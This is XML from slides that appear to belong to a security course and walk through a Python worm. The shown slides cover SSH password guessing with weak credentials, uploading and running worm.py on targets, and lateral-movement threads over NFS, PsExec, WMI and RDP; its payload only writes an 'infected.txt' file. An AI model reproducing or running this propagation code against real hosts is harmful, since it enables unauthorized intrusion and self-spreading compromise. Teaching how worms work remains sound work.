            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>target_ips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Iterates over the list of target IPs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>spread_ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>,)).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Starts a new thread to spread the worm via SSH to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nfs_spread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>,)).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Starts a new thread to spread the worm via NFS to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>psexec_lateral_movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, 'admin', 'admin')).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Starts a new thread to spread the worm via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>wmi_lateral_movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, 'admin', 'admin')).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Starts a new thread to spread the worm via WMI to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>spread_rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>,)).start()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Starts a new thread to spread the worm via RDP to the target.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D28EC7-74E2-3075-211A-1797B1ADE20C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823023" y="3131695"/>
            <a:ext cx="495424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/>
              <a:t>if __name__ == '__main__':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Ensures that the following code block runs only if the script is executed directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>main()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Calls the main function to start the worm-like behavior.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316828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55547150-A00F-E1EC-94CA-65B52F4AF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6142" y="123666"/>
            <a:ext cx="4791075" cy="34575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51A41F-61DA-2F3E-7FE5-BF5226D96595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850" y="2849"/>
            <a:ext cx="7457629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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>scapy.all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> import ARP, Ether, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>srp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports ARP, Ether, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>srp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> library, which is used for network scanning and packet manipulation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>paramiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imports the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>paramiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> library, which is used for SSH connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import threading:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the threading module, which is used for creating and managing threads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module, which provides a way to interact with the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>wmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module for interacting with Windows Management Instrumentation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import win32net: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imports the win32net module for network-related operations on Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import win32api: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imports the win32api module for various Windows API interactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pythoncom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pythoncom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module for COM operations on Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import base64: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imports the base64 module for encoding/decoding data in base64.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>import socket:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the socket library, which provides low-level networking interfaces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57013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, ряд&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A6D9CD-32C6-10F6-48D6-D22820BE7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22" y="260238"/>
            <a:ext cx="5981700" cy="1457325"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Рисунок 4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AC62C9AB-E53A-9DE8-2C25-D666ECF56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025" y="2891060"/>
            <a:ext cx="5126586" cy="38247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6C63E-EED3-4A3F-0CCB-4BBFB5DE66EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212793" y="2849"/>
            <a:ext cx="547785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def payload()::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Defines a function that writes a file named infected.txt indicating the system has been infected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>with open('infected.txt', 'w') as f::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Opens a file named infected.txt in write mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>("This system has been infected."):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Writes the infection message to the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>print("Payload executed: infected.txt created."):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Prints a message indicating the payload has been executed.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486F0-D431-A961-85AC-84760D0EA51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405784" y="3428288"/>
            <a:ext cx="434553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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>generate_worm_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Defines a function that returns the worm code as a string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm code defines a payload function similar to the one above, which creates an infected.txt file in the user's home directory.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365935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Барвистість&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26A8FA3-B9F3-91E5-CE40-A1F9AB185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63" y="0"/>
            <a:ext cx="374062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E4C20-7ABA-536D-8930-FFC84102141A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3922712" y="1588"/>
            <a:ext cx="8251824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1600" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>spread_ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Defines a function to spread the worm via SSH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>f"Attempting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> SSH exploit on {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Prints a message indicating the target IP for the SSH exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>username = 'kali'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>passwords = ['12345', '1234']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Defines the username and a list of passwords to try.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>client = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>paramiko.SSHClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Creates an SSH client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>client.set_missing_host_key_policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>paramiko.AutoAddPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Sets the policy to add the server's host key automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>worm_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>generate_worm_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Generates the worm code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>for password in passwords:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Iterates over the list of passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>client.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>, username=username, password=password)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>: Tries to connect to the target IP using the current password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>sftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>client.open_sftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Opens an SFTP session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>sftp.file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>/worm.py', 'w') as f:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>: Uploads the worm code to the target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>stdin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, stderr = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>client.exec_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>('python3 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/worm.py')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Executes the worm code on the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>stdin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>, stderr = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>client.exec_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>('echo $HOME')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Retrieves the home directory of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>sftp.stat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>infected_file</a:t>
            </a:r>
            <a:r>
